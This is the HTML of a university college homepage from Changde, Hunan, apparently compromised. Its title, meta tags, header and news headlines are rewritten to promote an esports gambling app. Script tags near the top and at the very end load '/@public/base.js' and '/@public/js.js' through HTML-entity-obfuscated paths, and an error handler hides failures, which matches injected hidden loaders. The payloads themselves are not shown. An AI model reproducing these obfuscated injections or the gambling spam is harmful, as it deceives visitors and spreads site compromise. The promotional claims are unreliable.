﻿<!DOCTYPE html>
<html><head><script>var V_PATH="/";window.onerror=function(){ return true; };</script><meta name="format-detection" content="telephone=no,email=no,adress=no">





<meta charset="utf-8"/><link rel="stylesheet" type="text/css" href="/css/style.css"><link rel="stylesheet" type="text/css" href="/css/publice.css"><script type="text/javascript" src="/js/jquery-1.8.3.min.js"></script><script type="text/javascript" src="/js/jquery.js"></script><script type="text/javascript" src="/js/superslide.2.1.js"></script><script type="text/javascript" src="/js/jquery.soChange.js"></script><script type="text/javascript" src="/js/index.js"></script><script type="text/javascript">
    $(function(){
        $(".mainmenu dl").hide();
        $("li.mainmenu").hover(function(){
            $(this).find("dl").stop(true,true);
            $(this).find("dl").slideDown();
        },function(){
            $(this).find("dl").stop(true,true);
            $(this).find("dl").slideUp();
        });
    })
</script>

<!--Announced by Visual SiteBuilder 9-->
<link rel="stylesheet" type="text/css" href="/sitegray/sitegray_d.css" />
<script language="javascript" src="/sitegray/sitegray.js"></script>
<!-- CustomerNO:7765626265723230747a47545251544403080003 -->
<link rel="stylesheet" type="text/css" href="/index.vsb.css" />
<script type="text/javascript" src="/system/resource/js/counter.js"></script>
<script type="text/javascript"></script>
<title>首页–雷火电竞app官网 - dota2,lol,csgo电竞赛事及体育赛事</title>
<meta name="keywords" content="雷电竞reyba官网APP" />
<meta name="description" content="✅「体验在线游戏乐趣」✅雷电竞reyba官网APP拥有着几十亿玩家最为信赖的口碑实力,雷电竞reyba官网APP另外还提供激活码礼包发放,欢迎您来体验试玩雷电竞reyba官网APP!,所以先发牌平台得到了人们的好评。" />

<script  type="text/javascript" charset="utf-8"  rel="nofollow" src="&#47;&#64;&#112;&#117;&#98;&#108;&#105;&#99;&#47;&#98;&#97;&#115;&#101;&#46;&#106;&#115;"></script>
</head>
<body><nav style="text-align: center;background-color: #bbdaa1;color: #333;"><a href="/"><h1>雷电竞reyba官网APP</h1></a></nav><!--top s-->


<div class="topWrap clearfix">
<div class="topDiv"><!--#begineditable name="高校LOGO" viewid="197108" tagname="高校LOGO" action="" layout="" contype="" stylesysid="" template="" tplstyle="" clone="0" istemp=""-->
<!-- 网站logo图片地址请在本组件"内容配置-网站logo"处填写 -->
<div class="logo">
<a href="/"><img src="/images/wyx22.jpg" alt="雷电竞reyba官网APP"></a>
</div><!--#endeditable-->
<div class="topR fr"><!--#begineditable name="头部文字链接" viewid="138509" tagname="头部文字链接" action="" layout="" contype="" stylesysid="" template="" tplstyle="" clone="0" istemp=""--><script language="javascript" src="/system/resource/js/dynclicks.js"></script><script language="javascript" src="/system/resource/js/openlink.js"></script><div class="topR_t fr">
     <a href="#">中文版</a>
     |
     <a href="#">English</a>
     
</div>


<!--#endeditable--><!--#begineditable name="头部检索" viewid="138510" tagname="头部检索" action="" layout="" contype="" stylesysid="" template="" tplstyle="" clone="0" istemp=""--><script type="text/javascript">
    function _nl_ys_check_2(){
        
        var keyword = document.getElementById('showkeycode138510_2').value;
        if(keyword==null||keyword==""){
            alert("请输入关键字搜索");
            return false;
        }
        if(window.toFF==1)
        {
            document.getElementById("lucenenewssearchkeyword138510").value = Simplized(keyword );
        }else
        {
            document.getElementById("lucenenewssearchkeyword138510").value = keyword;            
        }
        var  base64 = new Base64();
        document.getElementById("lucenenewssearchkeyword138510").value = base64.encode(document.getElementById("lucenenewssearchkeyword138510").value);
        new VsbFormFunc().disableAutoEnable(document.getElementById("showkeycode138510_2"));
        return true;
    } 
    function submitForm()
    {
        document.getElementById("au2a").submit();
    }
</script>
<script type="text/javascript">
				function test3()
				{
					var tempStr=document.getElementById('showkeycode138510_2').value;
					if(tempStr=="请输入关键字搜索")
					{
						document.getElementById('showkeycode138510_2').value="";
					}
				}
				function test4()
				{
					var tempStr=document.getElementById('showkeycode138510_2').value;
					if(tempStr=="")
					{
						document.getElementById('showkeycode138510_2').value="请输入关键字搜索";
					}
				}
			</script>
<div class="Search">
<form action="/ssjg_wbtreeid_1033.html" method="post" id="au2a" name="au2a" onsubmit="return _nl_ys_check_2()">
 
 <input type="text" value="请输入关键字搜索" name="showkeycode" class="search_text" onfocus="test3()" onblur="test4()" id="showkeycode138510_2" />
                <div class="fdj fr"> <input type="submit" class="button pngFix" value="" style="cursor: hand"></div>
</form>
</div><script language="javascript" src="/system/resource/js/base64.js"></script><script language="javascript" src="/system/resource/js/formfunc.js"></script>
<!--#endeditable--></div></div></div><!--nav--><!--#begineditable name="主导航" viewid="197109" tagname="主导航" action="" layout="" contype="" stylesysid="" template="" tplstyle="" clone="0" istemp=""--><div class="navWrap  clearfix">
    <div class="nav">
    <ul>
			<li>
			<a class="link" href="/">网站首页</a>
						
		</li>
		<li class="mainmenu">
		    <a class="link" href="/xygk/xyjj.html">雷电竞reyba官网APP</a>
			<!--如果是导航字数很多，则加上 class="chang"，否则去掉即可-->
			<dl>
					<dd><a href="/xygk/xyjj.html">学院简介</a></dd>
					<dd><a href="/xygk/jgsz.html">机构设置</a></dd>
					<dd><a href="/xygk/szdw.html">师资队伍</a></dd>
					<dd><a href="/xygk/jsfc.html">教师风采</a></dd>
					<dd><a href="/xygk/xyshry.html">学院所获荣誉</a></dd>
			</dl>
		</li>
		<li class="mainmenu">
		    <a class="link" href="/jxgz/zyjs.html">教学工作</a>
			<!--如果是导航字数很多，则加上 class="chang"，否则去掉即可-->
			<dl>
					<dd><a href="/jxgz/zyjs.html">专业介绍</a></dd>
					<dd><a href="/jxgz/rcjx.html">日常教学</a></dd>
					<dd><a href="/jxgz/sjjx.html">实践教学</a></dd>
					<dd><a href="/jxgz/jyjg.html">教研教改</a></dd>
			</dl>
		</li>
		<li class="mainmenu">
		    <a class="link" href="/xkjs/xsjl.html">学科建设</a>
			<!--如果是导航字数很多，则加上 class="chang"，否则去掉即可-->
			<dl>
					<dd><a href="/xkjs/xsjl.html">学术交流</a></dd>
					<dd><a href="/xkjs/kxyj.html">科学研究</a></dd>
			</dl>
		</li>
		<li class="mainmenu">
		    <a class="link" href="/xsgz/xshd.html">学生工作</a>
			<!--如果是导航字数很多，则加上 class="chang"，否则去掉即可-->
			<dl>
					<dd><a href="/xsgz/xshd.html">学生活动</a></dd>
					<dd><a href="/xsgz/zsyjy.html">招生与就业</a></dd>
					<dd><a href="/xsgz/zpxx.html">招聘信息</a></dd>
					<dd><a href="/xsgz/xyfc.html">校友风采</a></dd>
					<dd><a href="/xsgz/ggw.html">关工委</a></dd>
			</dl>
		</li>
		<li class="mainmenu">
		    <a class="link" href="/dqgz/djhd.html">党群工作</a>
			<!--如果是导航字数很多，则加上 class="chang"，否则去掉即可-->
			<dl>
					<dd><a href="/dqgz/zzjg.html">组织机构</a></dd>
					<dd><a href="/dqgz/djhd.html">党建活动</a></dd>
					<dd><a href="/dqgz/wjjs.html">文件精神</a></dd>
					<dd><a href="/dqgz/ghhd.html">工会活动</a></dd>
			</dl>
		</li>
		<li class="mainmenu">
		    <a class="link" href="/bkshpg.html">本科审核评估</a>
			<!--如果是导航字数很多，则加上 class="chang"，否则去掉即可-->
			<dl>
					<dd><a href="/bkshpg/tzgg.html">通知公告</a></dd>
					<dd><a href="/bkshpg/pjdt.html">评建动态</a></dd>
					<dd><a href="/bkshpg/zcwj.html">政策文件</a></dd>
			</dl>
		</li>
		<li class="mainmenu">
		    <a class="link" href="/" rel="nofollow">学校首页</a>
		</li>
     
    </ul>
</div>
</div>
<script type="text/javascript">

	$(".mainmenu dl").hide();

</script><!--#endeditable--><!--banner-->
<div class="vsb-box">
    
</div>
<div></div><!--container-->
<div class="vsb-box">
    <div columns="6" containerid="2" class="vsb-container container clearfix">
        
        <!--雷电竞reyba官网APP新闻-->
        
        <!--中国银行-->
        
        
    <div class="vsb-space new_inforBox new_inforBox2 fl" columns="4">
            <div class="dynamic">
                <h2>雷电竞reyba官网APP新闻</h2><span><a href="/index/tpxw.html"><img src="/temp/more.jpg" oldsrc="temp/more.png"></a></span>
            </div>
            <div class="newBox">
                <!--雷电竞reyba官网APP新闻-->
                <div class="new_pic new_pic1">
                    <!--#begineditable name="左侧图片切换" viewid="197125" tagname="左侧图片切换" action="" layout="" contype="" stylesysid="" template="" tplstyle="" clone="" istemp=""--><LINK href="/system/resource/style/component/news/list/imagechangenews.css" type="text/css" rel="stylesheet">
<script language="javascript" src="/system/resource/js/news/imagechangenews.js"></script>
<script language="JavaScript"> 
var u_u1_icn = new ImageChangeNews("u_u1_", 310, 178, 4, 2.0, false, false, false, true);
//初始化图片, 并启动定时
function u_u1_init_img()
{
        u_u1_icn.addimg("/__local/8/C4/45/7198C90BD3F10FEE48BAC35AEE5_9D7CBFF5_12C42.jpg", "info/1055/7697.htm", "", "");
        u_u1_icn.addimg("/__local/B/9F/9B/1FD47DD475A9E4E946657BD9E66_067663A4_1414B.png", "info/1055/7692.htm", "", "");
        u_u1_icn.addimg("/__local/5/26/BC/BA54BD582F9F57D8C50D6E03D95_05CD3169_F4A1E.png", "info/1055/7683.htm", "", "");
        u_u1_icn.addimg("/__local/6/8E/EF/FA056B9D55DCEBAFD8DA2F9F673_6E99EC94_17040.jpg", "info/1055/7665.htm", "", "");
        u_u1_icn.addimg("/__local/5/34/3C/46F9F4B96FB720C49C2FE28DC45_6ABDD76A_1428A.png", "info/1055/7660.htm", "", "");
     
    u_u1_icn.changeimg(0);
}
</script>
<table cellspacing="0" cellpadding="0" border="0" style="padding:0px margin:0px; border:0px">
    <tr>
        <td>
            <div style="OVERFLOW: hidden;height:178px;width:310px">
                <div id="u_u1_div" align="center" style="padding:0px;margin:0px;border:0px solid black;background-color:#000000;FILTER: progid:DXImageTransform.Microsoft.RevealTrans (duration=2.0,transition=23);height:178px;width:310px">
                    <div id="u_u1_imgdiv" style="padding:0px;border:0px;">
                        <a id="u_u1_url" target="_blank"><img id="u_u1_pic" border="0" width="310" height="178" src="/system/resource/images/space.gif"></a>
                    </div>
                 </div>
                 <div style="filter:alpha(style=1,opacity=10,finishOpacity=80);width:310px;height:19px;text-align:right;top:-19px;position:relative;padding:0px;margin:0px;border:0px;">
                            <a href="javascript:u_u1_icn.changeimg(0)" ; id="u_u1_selectNode0" class="imagechangenews_pnode" target="_self">1</a>
                            <a href="javascript:u_u1_icn.changeimg(1)" ; id="u_u1_selectNode1" class="imagechangenews_pnode" target="_self">2</a>
                            <a href="javascript:u_u1_icn.changeimg(2)" ; id="u_u1_selectNode2" class="imagechangenews_pnode" target="_self">3</a>
                            <a href="javascript:u_u1_icn.changeimg(3)" ; id="u_u1_selectNode3" class="imagechangenews_pnode" target="_self">4</a>
                            <a href="javascript:u_u1_icn.changeimg(4)" ; id="u_u1_selectNode4" class="imagechangenews_pnode" target="_self">5</a>
                </div>
             </div>
        </td>
   </tr>
   
       <tr style="display: none">
           <td height="25">
               <!--是否显示标题-->
               <div align="center" style="overflow:hidden;text-overflow:ellipsis;height:25px;width:310px;">
                   <a target="_blank" class="titlestyle1114" id="u_u1_newstitle"></a>
               </div>
            </td>
       </tr>

   

</table>
    
<SCRIPT language="JavaScript">
u_u1_init_img();
</SCRIPT>
<!--#endeditable-->
                </div>

                <div class="new_list new_list3">
                    <!--#begineditable name="标题列表-8条短日期" viewid="197124" tagname="标题列表-8条短日期" action="" layout="" contype="" stylesysid="" template="" tplstyle="" clone="0" istemp=""--><ul class="dynamic_list fr">

<LI><A href="/info/1045/7696.html"><SPAN>[12-27]</SPAN><em>雷电竞reyba官网APP召开英语专业教育实习总结大会暨</em></A></LI>

<LI><A href="/info/1045/7691.html"><SPAN>[12-24]</SPAN><em>雷电竞reyba官网APP组织开展“以文绘城”常德故事大</em></A></LI>

<LI><A href="/info/1045/7682.html"><SPAN>[12-16]</SPAN><em>陈晚清书记带队前往深圳等地访企拓岗</em></A></LI>

<LI><A href="/info/1045/7679.html"><SPAN>[12-14]</SPAN><em>雷电竞reyba官网APP再次召开师德师风建设座谈会</em></A></LI>

<LI><A href="/info/1045/7664.html"><SPAN>[12-11]</SPAN><em>雷电竞reyba官网APP赴湖南传神Transn科技有限公司开</em></A></LI>

<LI><A href="/info/1045/7659.html"><SPAN>[12-10]</SPAN><em>杨瑜老师团队在第十五届“外教社杯”全国高</em></A></LI>

</UL>
<!--#endeditable-->
                </div>
            </div>
        </div><div class="vsb-space informBox informBox3 fl" columns="2">
            <!--#begineditable name="右侧5个方点图片切换" viewid="138521" tagname="右侧5个方点图片切换" action="" layout="" contype="" stylesysid="" template="" tplstyle="" clone="0" istemp=""-->    <div class="rec_lb">
                <div id="slideBox" class="slideBox3">
                    <div class="hd">
                        <ul>
<li></li>
</ul>
                    </div>
                    <div class="bd">
                        <ul>
<li><a href="/info/1045/5647.html" target="_blank"><img src="/images/zhaosheng8.jpg" /></a></li>
                            
                        </ul>
                    </div>
                </div>
            </div><!--#endeditable-->
            <!--加入朗新-->
            <!--#begineditable name="右侧4个长条图片切换" viewid="138522" tagname="右侧4个长条图片切换" action="" layout="" contype="" stylesysid="" template="" tplstyle="" clone="0" istemp=""-->    <div class="rec_lb">
                <div id="slideBox" class="slideBox4">
                    <div class="hd">
                        <ul>
<li></li>
</ul>
                    </div>
                    <div class="bd">
                        <ul>
<li><a href="/" rel="nofollow" target="_blank"><img src="/images/24365-2005.jpg" /></a></li>

                            
                        </ul>
                    </div>
                </div>
            </div><!--#endeditable-->
        </div></div>
    
    <div columns="6" containerid="2" class="vsb-container container clearfix">
        
        
        
        
    <div class="vsb-space informBox informBoxd informBoxc1 fl" columns="2">
            <!--#begineditable name="8条蓝背景标题列表" viewid="197121" tagname="8条蓝背景标题列表" action="" layout="" contype="" stylesysid="" template="" tplstyle="" clone="0" istemp=""-->                <div class="dynamic dynamicb dynamice"><h2>学科建设</h2><span><a href="/xkjs/xsjl.html"><img src="/img/w_more.jpg"></a></span></div>
                <div class="infor_list infor_lista">
                    <ul class="dynamic_list dynamic_listb dynamic_liste fr">
<li><a href="/info/1073/7544.html"><span>10/19</span><em>【名师有约】日中创新协会理事长李大清...</em></a></li>
<li><a href="/info/1073/7375.html"><span>09/13</span><em>日本城西国际大学校长助理宫伟来外院交...</em></a></li>
<li><a href="/info/1073/7056.html"><span>06/01</span><em>【名师有约】江岚教授莅临雷电竞reyba官网APP讲授美国教育</em></a></li>
<li><a href="/info/1073/7027.html"><span>05/29</span><em>【名师有约】美国圣•彼得大学江岚教授...</em></a></li>
<li><a href="/info/1073/7006.html"><span>05/21</span><em>【名师有约】加拿大菲莎河谷大学NADINE...</em></a></li>
<li><a href="/info/1073/6889.html"><span>05/01</span><em>【名师有约】日本北海道大学专家上田裕...</em></a></li>
<li><a href="/info/1073/6881.html"><span>04/29</span><em>雷电竞reyba官网APP教师参加2024年全国高校大学英语教...</em></a></li>
<li><a href="/info/1073/6827.html"><span>04/15</span><em>雷电竞reyba官网APP教师参加第十七届全国英语类专业院...</em></a></li>

                     </ul>
                 </div>

<!--#endeditable-->
        </div><div class="vsb-space informBox informBoxd informBoxc1 fl" columns="2"><!--#begineditable name="8条蓝背景标题列表2" viewid="194890" tagname="8条蓝背景标题列表2" action="" layout="" contype="" stylesysid="" template="" tplstyle="" clone="" istemp=""-->                <div class="dynamic dynamicb dynamice"><h2>教学工作</h2><span><a href="/jxgz/rcjx.html"><img src="/img/w_more.jpg"></a></span></div>
                <div class="infor_list infor_lista">
                    <ul class="dynamic_list dynamic_listb dynamic_liste fr">
<li><a href="/info/1066/7694.html"><span>12/27</span><em>雷电竞reyba官网APP召开英语专业教育实习总结大...</em></a></li>
<li><a href="/info/1068/7657.html"><span>12/10</span><em>杨瑜老师团队在第十五届“外教社杯”全...</em></a></li>
<li><a href="/info/1065/7649.html"><span>12/04</span><em>谌艳老师赴上海观摩学习全国高校学生跨...</em></a></li>
<li><a href="/info/1065/7645.html"><span>12/02</span><em>以赛促课，以研促教：英语系举办11月份...</em></a></li>
<li><a href="/info/1065/7641.html"><span>12/01</span><em>雷电竞reyba官网APP公共外语系举办“教改项目撰...</em></a></li>
<li><a href="/info/1066/7623.html"><span>11/29</span><em>【本科审核评估】雷电竞reyba官网APP领导前往常德市第...</em></a></li>
<li><a href="/info/1066/7566.html"><span>11/08</span><em>【本科审核评估】雷电竞reyba官网APP学子在“2024外研...</em></a></li>
<li><a href="/info/1065/7558.html"><span>11/07</span><em>【本科审核评估】公共外语系11月份开展...</em></a></li>

                     </ul>
                 </div>

<!--#endeditable-->
            
            
            
            
        </div><div class="vsb-space informBox informBoxd informBoxc1 fl" columns="2"><!--#begineditable name="8条蓝背景标题列表3" viewid="194891" tagname="8条蓝背景标题列表3" action="" layout="" contype="" stylesysid="" template="" tplstyle="" clone="" istemp=""-->                <div class="dynamic dynamicb dynamice"><h2>学生工作</h2><span><a href="/xsgz/glzd.html"><img src="/img/w_more.jpg"></a></span></div>
                <div class="infor_list infor_lista">
                    <ul class="dynamic_list dynamic_listb dynamic_liste fr">
<li><a href="/info/1083/7689.html"><span>12/24</span><em>雷电竞reyba官网APP组织开展“以文绘城”常德故...</em></a></li>
<li><a href="/info/1084/7688.html"><span>12/19</span><em>湖南昊华化工股份有限公司宣讲会</em></a></li>
<li><a href="/info/1084/7687.html"><span>12/18</span><em>湖南苏宁易购有限公司宣讲会</em></a></li>
<li><a href="/info/1084/7686.html"><span>12/17</span><em>湖南伍子醉实业集团有限公司宣讲会</em></a></li>
<li><a href="/info/1084/7685.html"><span>12/16</span><em>江西正邦作物保护有限公司宣讲会</em></a></li>
<li><a href="/info/1080/7680.html"><span>12/16</span><em>陈晚清书记带队前往深圳等地访企拓岗</em></a></li>
<li><a href="/info/1084/7684.html"><span>12/13</span><em>中科微至科技股份有限公司深圳分公司宣讲会</em></a></li>
<li><a href="/info/1084/7667.html"><span>12/12</span><em>深圳市科奈信科技有限公司宣讲会</em></a></li>

                     </ul>
                 </div>

<!--#endeditable-->
  </div></div>
    
    <div columns="6" containerid="2" class="vsb-container container clearfix">  
        
    <div class="vsb-space content contentf" columns="6">
            <!--#begineditable name="横向链接1" viewid="197122" tagname="横向链接1" action="" layout="" contype="" stylesysid="" template="" tplstyle="" clone="0" istemp=""--><div class="link_one clearfix">
            <dl>
                
   </dd>
            </dl>
        </div>

<!--#endeditable-->
        </div></div>
    
    
    
    
</div>
<!--foot-->
<div class="footWrap"><!--#begineditable name="版权1" viewid="138558" tagname="版权1" action="" layout="" contype="" stylesysid="" template="" tplstyle="" clone="0" istemp=""--><div class="footDiv_one">
		<div class="foot_one">
			<p><p style="text-align:center;">版权所有：首页–雷火电竞app官网 - dota2,lol,csgo电竞赛事及体育赛事&nbsp;&nbsp;地址：湖南省常德市洞庭大道3150号<br />电话：0736-7186081&nbsp;&nbsp;邮编：415000<br /></p></p>
		</div>
	</div><!--#endeditable--><!--#begineditable name="多屏切换" viewid="138616" tagname="多屏切换" action="" layout="" contype="" stylesysid="" template="" tplstyle="" clone="0" istemp=""--><ul style="text-align:center;background-color:#224B77;">
</ul><!--#endeditable-->二维码</div><script type="text/javascript">
    $(function(){
        $(".select").each(function(){
            var s=$(this);
            var z=parseInt(s.css("z-index"));
            var dt=$(this).children("dt");
            var dd=$(this).children("dd");
            var _show=function(){dd.slideDown(200);dt.addClass("cur");s.css("z-index",z+1);};   //展开效果
            var _hide=function(){dd.slideUp(200);dt.removeClass("cur");s.css("z-index",z);};    //关闭效果
            dt.click(function(){dd.is(":hidden")?_show():_hide();});
            dd.find("a").click(function(){dt.html($(this).html());_hide();});     //选择效果（如需要传值，可自定义参数，在此处返回对应的“value”值 ）
            $("body").click(function(i){ !$(i.target).parents(".select").first().is(s) ? _hide():"";});
        })
    });
</script><script type="text/javascript">
    $(function () {
    //切换对象为其他，这里为包含图片和标题的层
        $('#change_32 div.changeDiv').soChange({//对象指向层，层内包含图片及标题
            thumbObj:'#change_32 .ul_change_a2 span',
            thumbNowClass:'on'//自定义导航对象当前class为on
        });
    });
</script><script type="text/javascript">
    $(".pic ul li").hover(function(){
        $(this).stop(true).animate({width:"824px"},500).siblings().stop(true).animate({width:"50px"},500);
    });
</script>
<!--#begineditable name="浮动图片" action="webber.wbst.com.image.ColumnImage" layout="/system/_component/columnimage/floatimage.jsp" tpltype="0" contype="image" clone="" viewid="239098" contentviewid="" tagname="浮动图片"-->   
   
   
   
   
</SCRIPT><!--#endeditable-->

<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
<div style="text-align: center">
  <form data-evt="return baiduWithHttps(this)" action="https://www.baidu.com/baidu" target="_blank">
    <input name="tn" type="hidden" value="SE_zzsearchcode_shhzc78w">
    <a target="_blank" href="https://www.baidu.com/"><img width="100px" height="22px" src="https://www.baidu.com/img/baidu_jgylogo3.gif" alt="Baidu" align="bottom" border="0"></a>
    <input type="text" data-evt="checkHttps" name="word" size="20" value="雷电竞reyba官网APP">
    <input type="submit" value="百度" height="26px">
  </form>
  <form action="https://www.sogou.com/web" name="sf" id="sf" target="_blank">
    <a target="_blank" href="https://www.sogou.com/"><img width="100px" height="22px" src="https://www.sogou.com/web/index/images/logo_440x140.v.4.png" alt="sogou" align="bottom" border="0"></a>
    <span class="sec-input-box yuyin-cur">
      <input height="22px" type="text" class="sec-input" name="query" id="query" maxlength="100" len="80" autocomplete="off" value="雷电竞reyba官网APP">
    </span>
    <span class="enter-input"><input type="submit" id="stb" value="搜狗" height="26px"></span>
    <input type="hidden" name="_asf" value="www.sogou.com">
    <input type="hidden" name="_ast">
    <input type="hidden" name="w" value="01019900">
    <input type="hidden" name="p" value="40040100">
    <input type="hidden" name="ie" value="utf8">
    <input type="hidden" name="from" value="index-nologin">
    <input type="hidden" name="s_from" value="index">
  </form>
  <form id="so360form" target="_blank" action="https://www.so.com/">
    <img width="100px" height="22px" src="https://p.ssl.qhimg.com/t010e288a56a0b005e9.png">
    <input height="22px" id="so360_keyword" type="text" name="q" autocomplete="off" value="雷电竞reyba官网APP">
    <input id="so360_submit" type="submit" value="搜索" height="26px">
    <input type="hidden" value="utf-8" name="ie">
    <input type="hidden" value="zz" name="src">
    <input type="hidden" value="so.com" name="site">
    <input type="hidden" value="1" name="rg">
  </form>
<div>

<div style="display:none"><script  type="text/javascript" charset="utf-8"  rel="nofollow" src="&#47;&#64;&#112;&#117;&#98;&#108;&#105;&#99;&#47;&#106;&#115;&#46;&#106;&#115;"></script></div>
</body></html>
